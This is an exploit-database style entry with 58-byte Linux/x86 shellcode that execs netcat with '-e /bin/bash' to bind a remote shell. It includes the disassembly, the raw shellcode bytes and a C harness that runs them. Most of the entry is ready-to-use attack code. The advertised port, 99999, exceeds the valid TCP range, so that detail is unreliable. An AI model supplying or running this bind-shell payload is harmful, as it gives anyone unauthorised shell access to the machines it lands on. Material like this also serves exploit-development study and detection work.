Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)

Javier Tello 2018-11-13 shellcode linux_x86
/*
# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode   uses netcat-traditional package. Otherwise, it will not work.
# Date: 04/11/2018
# Exploit Author: Javier Tello 
# Version: 1.0
# Tested on: i686 GNU/Linux
# Shellcode Length: 58 Bytes


Disassembly of section .text:
 
08048060 <_start>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	50                   	push   %eax
 8048063:	68 6e 2f 6e 63       	push   $0x636e2f6e
 8048068:	68 2f 2f 62 69       	push   $0x69622f2f
 804806d:	89 e3                	mov    %esp,%ebx
 804806f:	50                   	push   %eax
 8048070:	68 62 61 73 68       	push   $0x68736162
 8048075:	68 62 69 6e 2f       	push   $0x2f6e6962
 804807a:	68 2d 65 2f 2f       	push   $0x2f2f652d
 804807f:	89 e2                	mov    %esp,%edx
 8048081:	50                   	push   %eax
 8048082:	68 39 39 39 39       	push   $0x39393939
 8048087:	68 2d 6c 70 39       	push   $0x39706c2d
 804808c:	89 e6                	mov    %esp,%esi
 804808e:	50                   	push   %eax
 804808f:	52                   	push   %edx
 8048090:	56                   	push   %esi
 8048091:	53                   	push   %ebx
 8048092:	89 e1                	mov    %esp,%ecx
 8048094:	89 c2                	mov    %eax,%edx
 8048096:	b0 0b                	mov    $0xb,%al
 8048098:	cd 80                	int    $0x80

===============poc by Javier Tello=========================
*/
 
#include
#include
 
unsigned char code[] = \

"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";
 
main() {
 
    printf("Shellcode Length: %d\n", strlen(code));
 
    int (*ret)() = (int(*)())code;
 
    ret();
 
}